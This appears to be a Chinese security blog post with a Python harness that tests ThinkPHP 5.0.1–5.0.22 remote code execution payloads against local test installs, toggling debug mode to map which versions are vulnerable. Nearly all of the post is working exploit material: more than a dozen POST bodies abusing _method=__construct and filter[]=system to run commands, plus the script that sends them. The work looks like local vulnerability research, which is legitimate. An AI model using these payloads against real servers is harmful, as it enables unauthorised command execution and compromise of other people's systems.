thinkphp(一) : 5.0.1~22控制器RCE

RCE版本范围 : 5.0.1~22

import requests,time
args=""
data={}
# debug=false时无RCE,debug=true时5.0.21~22
# data={"_method":"__construct","filter":"system","server[REQUEST_METHOD]":"whoami"}

#debug=false时5.0.1~12,debug=true时5.0.1~20
# data="s=whoami&_method=__construct&method=POST&filter[]=system"

#debug=false时5.0.19,debug=true时5.0.2~22
# args="?s=captcha"
# data="_method=__construct&filter[]=system&method=get&get[]=whoami"

#debug=false时无RCE,debug=true时5.0.21~22
# args="?s=captcha"
# data="_method=__construct&filter=system&method=get&server[REQUEST_METHOD]=whoami"

# debug=false时5.0.19,debug=true时5.0.22~22
# args="?s=captcha"
# data="_method=__construct&filter=system&method=get&get[]=whoami"

#debug=false时5.0.1~12,debug=true时5.0.1~20
# args="?s=index/index"
# data="aaaa=whoami&_method=__construct&method=POST&filter[]=system"

#debug=false时5.0.1~12,debug=true时5.0.1~20
# args="?s=index/index"
# data="s=whoami&_method=__construct&method=POST&filter[]=system"

#debug=false时5.0.1~12,debug=true时5.0.1~20
# args="?s=index/index"
# data="aaaa=whoami&_method=__construct&method=GET&filter[]=system"

#debug=false时5.0.1~12,debug=true时5.0.1~22
# args="?s=index/index"
# data="_method=__construct&method=GET&filter[]=system&get[]=whoami"

#debug=false时5.0.8~12,debug=true时5.0.8~20
# args="?s=index/index"
# data="c=system&f=whoami&_method=filter"

#debug=false时5.0.1~12,debug=true时5.0.1~20
# args="?s=index/index"
# data="s=whoami&_method=__construct&method=POST&filter[]=system"

#debug=false时5.0.1~12,debug=true时5.0.1~20
# args="?s=index/index"
# data="aaaa=whoami&_method=__construct&method=GET&filter[]=system"

#debug=false时无RCE,debug=true时5.0.21~22
# args="?s=captcha"
# data="_method=__construct&filter[]=system&method=GET&server[REQUEST_METHOD]=whoami"

url="http://127.0.0.1/tp/tp{version}/public/index.php"
judeju_str="laptop-da05slh8\\26406"

success=[]
def get_data(post_data):
    arr=str(post_data).split("&")
    end={}
    print(arr)
    for i in arr:
        t=i.split("=")
        end[t[0]]=t[1]
    return end

def change_debug(file_anme,data):
    f=open(file_anme,"w")
    f.write(data)
    f.close()

def once():
    for i in range(25):
        _args = args
        _url = url.format(version="5.0." + str(i)) + args
        print(i)
        if (data != {}):
            text = requests.post(_url,data).text
        else:
            text = r=requests.get(_url).text
        if (judeju_str in text):
            print("success!!!")
            success.append("5.0."+str(i))
            # time.sleep(1)

if(type(data)!=type({})):
    data=get_data(data)
for debug in ["false","true"]:
    success.append("debug="+debug+"时,成功RCE的有:")
    print("Here is \"app_debug = "+debug+"\"")
    for i in range(25):
        try:
            file_name = "D:\phpstudy\WWW\\tp\\tp5.0.{version}\.env"
            change_debug(file_name.format(version=str(i)), "app_debug = "+debug)
        except:
            pass
    once()
    print(success)
    for j in success:
        print(str(j))
    print()
#没有5.0.17也没有5.0.23
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇